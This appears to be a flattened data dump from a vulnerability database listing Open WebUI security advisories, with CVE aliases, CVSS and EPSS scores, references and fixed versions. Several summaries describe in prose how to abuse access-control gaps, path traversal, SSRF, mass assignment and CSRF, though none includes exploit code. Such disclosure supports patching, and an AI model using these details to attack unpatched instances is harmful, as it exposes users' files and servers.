vulnerability VCID-66zh-9jk7-9bfx
17
vulnerability VCID-68jf-2utx-x7br
18
vulnerability VCID-6rbm-rm25-hqgy
19
vulnerability VCID-7j5a-pu4k-kucf
20
vulnerability VCID-7nbc-ng1s-suck
21
vulnerability VCID-8n6u-wgz9-1bgj
22
vulnerability VCID-8nzh-cpda-dkca
23
vulnerability VCID-8qvj-xndv-v3ay
24
vulnerability VCID-8y4k-pj2n-8uhm
25
vulnerability VCID-94nj-qkdf-xfhn
26
vulnerability VCID-9jud-sr2a-8yc3
27
vulnerability VCID-9zyk-459z-x3a4
28
vulnerability VCID-chug-ma8r-cucc
29
vulnerability VCID-cw4k-3s8z-uqh8
30
vulnerability VCID-dz6g-jgmg-wqce
31
vulnerability VCID-dzh3-rqx4-fqhv
32
vulnerability VCID-ef1t-pxjm-j7cz
33
vulnerability VCID-gw77-ux3j-qfaa
34
vulnerability VCID-hj5f-yk3y-ffdg
35
vulnerability VCID-jfs9-dps1-27a2
36
vulnerability VCID-jnsg-u9dy-r3d5
37
vulnerability VCID-k17g-bd9g-67f7
38
vulnerability VCID-k9jf-5jzd-pkge
39
vulnerability VCID-mn21-kwuu-w7by
40
vulnerability VCID-n4ma-zcpv-5fbp
41
vulnerability VCID-nxvm-97r4-6ybz
42
vulnerability VCID-pkds-1xgn-q3bv
43
vulnerability VCID-pvep-chj7-ekeg
44
vulnerability VCID-pwsg-72yy-quhk
45
vulnerability VCID-q682-k826-efhv
46
vulnerability VCID-qgfh-7u8n-y7c7
47
vulnerability VCID-qjt1-zxx8-r7ht
48
vulnerability VCID-r7vt-4bqm-f7hb
49
vulnerability VCID-reqw-pfm8-c7g5
50
vulnerability VCID-rhhj-rccv-87hw
51
vulnerability VCID-s625-eg1w-gfd1
52
vulnerability VCID-t571-d65a-cyb2
53
vulnerability VCID-tz2k-gazs-mqgd
54
vulnerability VCID-u25g-p4nx-gqd1
55
vulnerability VCID-ujye-g4rj-8be5
56
vulnerability VCID-um53-kf7u-kkg6
57
vulnerability VCID-vghe-uuzj-m7cu
58
vulnerability VCID-vkx3-71kv-sugt
59
vulnerability VCID-w2vd-r3hr-w3bt
60
vulnerability VCID-wb88-83cj-ffhy
61
vulnerability VCID-wcz4-vwx4-tufb
62
vulnerability VCID-yug9-shts-kufb
63
vulnerability VCID-yysb-dk2k-f7g4
64
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.3.33.dev1
aliases CVE-2024-12534, GHSA-g3mx-83mp-3rwc
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3hv8-ys1d-63a6
10
url VCID-4rz6-hw32-jueb
vulnerability_id VCID-4rz6-hw32-jueb
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id). Version 0.8.6 patches the issue.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-29070
reference_id
reference_type
scores
0
value 0.00051
scoring_system epss
scoring_elements 0.16299
published_at 2026-06-14T12:55:00Z
1
value 0.00051
scoring_system epss
scoring_elements 0.16175
published_at 2026-06-11T12:55:00Z
2
value 0.00051
scoring_system epss
scoring_elements 0.16329
published_at 2026-06-13T12:55:00Z
3
value 0.00051
scoring_system epss
scoring_elements 0.16317
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-29070
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/knowledge.py#L803
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/knowledge.py#L803
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-29070
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-29070
4
reference_url https://github.com/advisories/GHSA-26gm-93rw-cchf
reference_id GHSA-26gm-93rw-cchf
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-26gm-93rw-cchf
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-26gm-93rw-cchf
reference_id GHSA-26gm-93rw-cchf
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-30T11:49:47Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-26gm-93rw-cchf
fixed_packages
0
url pkg:pypi/open-webui@0.8.6
purl pkg:pypi/open-webui@0.8.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-6rbm-rm25-hqgy
13
vulnerability VCID-8nzh-cpda-dkca
14
vulnerability VCID-8y4k-pj2n-8uhm
15
vulnerability VCID-chug-ma8r-cucc
16
vulnerability VCID-cw4k-3s8z-uqh8
17
vulnerability VCID-dz6g-jgmg-wqce
18
vulnerability VCID-dzh3-rqx4-fqhv
19
vulnerability VCID-ef1t-pxjm-j7cz
20
vulnerability VCID-hj5f-yk3y-ffdg
21
vulnerability VCID-jfs9-dps1-27a2
22
vulnerability VCID-k9jf-5jzd-pkge
23
vulnerability VCID-n4ma-zcpv-5fbp
24
vulnerability VCID-nxvm-97r4-6ybz
25
vulnerability VCID-pkds-1xgn-q3bv
26
vulnerability VCID-q682-k826-efhv
27
vulnerability VCID-qgfh-7u8n-y7c7
28
vulnerability VCID-qjt1-zxx8-r7ht
29
vulnerability VCID-r7vt-4bqm-f7hb
30
vulnerability VCID-reqw-pfm8-c7g5
31
vulnerability VCID-rhhj-rccv-87hw
32
vulnerability VCID-s625-eg1w-gfd1
33
vulnerability VCID-t571-d65a-cyb2
34
vulnerability VCID-um53-kf7u-kkg6
35
vulnerability VCID-vghe-uuzj-m7cu
36
vulnerability VCID-vkx3-71kv-sugt
37
vulnerability VCID-w2vd-r3hr-w3bt
38
vulnerability VCID-wb88-83cj-ffhy
39
vulnerability VCID-wcz4-vwx4-tufb
40
vulnerability VCID-yug9-shts-kufb
41
vulnerability VCID-yysb-dk2k-f7g4
42
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6
aliases CVE-2026-29070, GHSA-26gm-93rw-cchf
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4rz6-hw32-jueb
11
url VCID-4sn4-mrbm-dfgh
vulnerability_id VCID-4sn4-mrbm-dfgh
summary OpenWebUI version 0.3.0 contains a vulnerability in the audio API endpoint `/audio/api/v1/transcriptions` that allows for arbitrary file upload. The application performs insufficient validation on the `file.content_type` and allows user-controlled filenames, leading to a path traversal vulnerability. This can be exploited by an authenticated user to overwrite critical files within the Docker container, potentially leading to remote code execution as the root user.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-8060
reference_id
reference_type
scores
0
value 0.02108
scoring_system epss
scoring_elements 0.84529
published_at 2026-06-13T12:55:00Z
1
value 0.02108
scoring_system epss
scoring_elements 0.84521
published_at 2026-06-14T12:55:00Z
2
value 0.02108
scoring_system epss
scoring_elements 0.84464
published_at 2026-06-11T12:55:00Z
3
value 0.02108
scoring_system epss
scoring_elements 0.84519
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-8060
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/613a087387c094e71ee91d29c015195ef401e160
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/613a087387c094e71ee91d29c015195ef401e160
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-8060
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-8060
4
reference_url https://huntr.com/bounties/a3b1a4b7-c723-496d-842c-844cc0988fe9
reference_id a3b1a4b7-c723-496d-842c-844cc0988fe9
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-20T17:49:58Z/
url https://huntr.com/bounties/a3b1a4b7-c723-496d-842c-844cc0988fe9
5
reference_url https://github.com/advisories/GHSA-ff5c-56m7-vc75
reference_id GHSA-ff5c-56m7-vc75
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-ff5c-56m7-vc75
fixed_packages
0
url pkg:pypi/open-webui@0.5.17
purl pkg:pypi/open-webui@0.5.17
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7j5a-pu4k-kucf
17
vulnerability VCID-7nbc-ng1s-suck
18
vulnerability VCID-8n6u-wgz9-1bgj
19
vulnerability VCID-8nzh-cpda-dkca
20
vulnerability VCID-8y4k-pj2n-8uhm
21
vulnerability VCID-94nj-qkdf-xfhn
22
vulnerability VCID-9jud-sr2a-8yc3
23
vulnerability VCID-chug-ma8r-cucc
24
vulnerability VCID-cw4k-3s8z-uqh8
25
vulnerability VCID-dz6g-jgmg-wqce
26
vulnerability VCID-dzh3-rqx4-fqhv
27
vulnerability VCID-ef1t-pxjm-j7cz
28
vulnerability VCID-gw77-ux3j-qfaa
29
vulnerability VCID-hj5f-yk3y-ffdg
30
vulnerability VCID-jfs9-dps1-27a2
31
vulnerability VCID-jnsg-u9dy-r3d5
32
vulnerability VCID-k17g-bd9g-67f7
33
vulnerability VCID-k9jf-5jzd-pkge
34
vulnerability VCID-mn21-kwuu-w7by
35
vulnerability VCID-n4ma-zcpv-5fbp
36
vulnerability VCID-nxvm-97r4-6ybz
37
vulnerability VCID-pkds-1xgn-q3bv
38
vulnerability VCID-pvep-chj7-ekeg
39
vulnerability VCID-pwsg-72yy-quhk
40
vulnerability VCID-q682-k826-efhv
41
vulnerability VCID-qgfh-7u8n-y7c7
42
vulnerability VCID-qjt1-zxx8-r7ht
43
vulnerability VCID-r7vt-4bqm-f7hb
44
vulnerability VCID-reqw-pfm8-c7g5
45
vulnerability VCID-rhhj-rccv-87hw
46
vulnerability VCID-s625-eg1w-gfd1
47
vulnerability VCID-t571-d65a-cyb2
48
vulnerability VCID-tz2k-gazs-mqgd
49
vulnerability VCID-u25g-p4nx-gqd1
50
vulnerability VCID-ujye-g4rj-8be5
51
vulnerability VCID-um53-kf7u-kkg6
52
vulnerability VCID-vghe-uuzj-m7cu
53
vulnerability VCID-vkx3-71kv-sugt
54
vulnerability VCID-w2vd-r3hr-w3bt
55
vulnerability VCID-wb88-83cj-ffhy
56
vulnerability VCID-wcz4-vwx4-tufb
57
vulnerability VCID-yug9-shts-kufb
58
vulnerability VCID-yysb-dk2k-f7g4
59
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.5.17
aliases CVE-2024-8060, GHSA-ff5c-56m7-vc75
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4sn4-mrbm-dfgh
12
url VCID-4v8w-kv6g-kkbc
vulnerability_id VCID-4v8w-kv6g-kkbc
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, multiple endpoints accept a user-supplied file_id and attach the referenced file to a resource the caller controls (folder knowledge, knowledge-base contents) without verifying that the caller owns or has been granted access to the file. The file's content then becomes reachable through the downstream RAG / file-content paths, allowing any authenticated user to exfiltrate any other user's private file — and on the knowledge-base path, also to overwrite it — given knowledge of the file's UUID. This affects backend/open_webui/routers/folders.py (POST /api/v1/folders/{id}/update), backend/open_webui/routers/knowledge.py (add_file_to_knowledge_by_id), and backend/open_webui/routers/knowledge.py (add_files_to_knowledge_by_id_batch). This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45402
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01734
published_at 2026-06-14T12:55:00Z
1
value 0.00012
scoring_system epss
scoring_elements 0.0172
published_at 2026-06-11T12:55:00Z
2
value 0.00012
scoring_system epss
scoring_elements 0.01726
published_at 2026-06-13T12:55:00Z
3
value 0.00012
scoring_system epss
scoring_elements 0.01723
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45402
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45402
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45402
3
reference_url https://github.com/advisories/GHSA-r472-mw7m-967f
reference_id GHSA-r472-mw7m-967f
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-r472-mw7m-967f
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f
reference_id GHSA-r472-mw7m-967f
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-15T22:17:20Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45402, GHSA-r472-mw7m-967f
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4v8w-kv6g-kkbc
13
url VCID-4x63-8x64-d3bq
vulnerability_id VCID-4x63-8x64-d3bq
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, a parsing difference between the urlparse and requests libraries led to an SSRF bypass vulnerability. This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45400
reference_id
reference_type
scores
0
value 0.00033
scoring_system epss
scoring_elements 0.10286
published_at 2026-06-13T12:55:00Z
1
value 0.00033
scoring_system epss
scoring_elements 0.10269
published_at 2026-06-14T12:55:00Z
2
value 0.00033
scoring_system epss
scoring_elements 0.10234
published_at 2026-06-11T12:55:00Z
3
value 0.00033
scoring_system epss
scoring_elements 0.10283
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45400
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45400
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45400
4
reference_url https://github.com/advisories/GHSA-8w7q-q5jp-jvgx
reference_id GHSA-8w7q-q5jp-jvgx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8w7q-q5jp-jvgx
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-8w7q-q5jp-jvgx
reference_id GHSA-8w7q-q5jp-jvgx
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T21:07:46Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-8w7q-q5jp-jvgx
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45400, GHSA-8w7q-q5jp-jvgx
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4x63-8x64-d3bq
14
url VCID-5319-t7jm-y3bx
vulnerability_id VCID-5319-t7jm-y3bx
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, FolderForm uses model_config = ConfigDict(extra='allow'), which permits arbitrary fields to pass through Pydantic validation and be included in model_dump(exclude_unset=True). In insert_new_folder, the server-assigned user_id is placed at the start of the dict and then overwritten by the spread of form data. Because FolderModel declares user_id: str as a real field (not just a form extra), any attacker-supplied user_id in the POST body is accepted by the model and persisted on the Folder row. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44550
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01843
published_at 2026-06-14T12:55:00Z
1
value 0.00012
scoring_system epss
scoring_elements 0.01831
published_at 2026-06-11T12:55:00Z
2
value 0.00012
scoring_system epss
scoring_elements 0.01834
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44550
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44550
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44550
3
reference_url https://github.com/advisories/GHSA-hr43-rjmr-7wmm
reference_id GHSA-hr43-rjmr-7wmm
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hr43-rjmr-7wmm
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-hr43-rjmr-7wmm
reference_id GHSA-hr43-rjmr-7wmm
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:16:08Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-hr43-rjmr-7wmm
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44550, GHSA-hr43-rjmr-7wmm
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5319-t7jm-y3bx
15
url VCID-5jna-wvd7-j7cm
vulnerability_id VCID-5jna-wvd7-j7cm
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, GET /api/v1/retrieval/ returns live RAG pipeline configuration to any unauthenticated HTTP client. No Authorization header, cookie, or API key is required. Every adjacent endpoint on the same router (/embedding, /config) is correctly guarded by get_admin_user, making this a targeted omission. This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45397
reference_id
reference_type
scores
0
value 0.01075
scoring_system epss
scoring_elements 0.78274
published_at 2026-06-12T12:55:00Z
1
value 0.01075
scoring_system epss
scoring_elements 0.78283
published_at 2026-06-14T12:55:00Z
2
value 0.01075
scoring_system epss
scoring_elements 0.78206
published_at 2026-06-11T12:55:00Z
3
value 0.01075
scoring_system epss
scoring_elements 0.78288
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45397
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45397
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45397
3
reference_url https://github.com/advisories/GHSA-65pg-qhhw-mxwg
reference_id GHSA-65pg-qhhw-mxwg
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-65pg-qhhw-mxwg
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-65pg-qhhw-mxwg
reference_id GHSA-65pg-qhhw-mxwg
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-18T14:34:06Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-65pg-qhhw-mxwg
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45397, GHSA-65pg-qhhw-mxwg
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5jna-wvd7-j7cm
16
url VCID-5wfg-zqcy-c7ar
vulnerability_id VCID-5wfg-zqcy-c7ar
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, an application-wide Cross-Site Request Forgery (CSRF) vulnerability was found in Open-WebUI's image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions. This vulnerability is fixed in 0.9.3.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45317
reference_id
reference_type
scores
0
value 6e-05
scoring_system epss
scoring_elements 0.00483
published_at 2026-06-14T12:55:00Z
1
value 6e-05
scoring_system epss
scoring_elements 0.00475
published_at 2026-06-13T12:55:00Z
2
value 6e-05
scoring_system epss
scoring_elements 0.00472
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45317
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45317
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45317
4
reference_url https://github.com/advisories/GHSA-j6w6-986j-2m2m
reference_id GHSA-j6w6-986j-2m2m
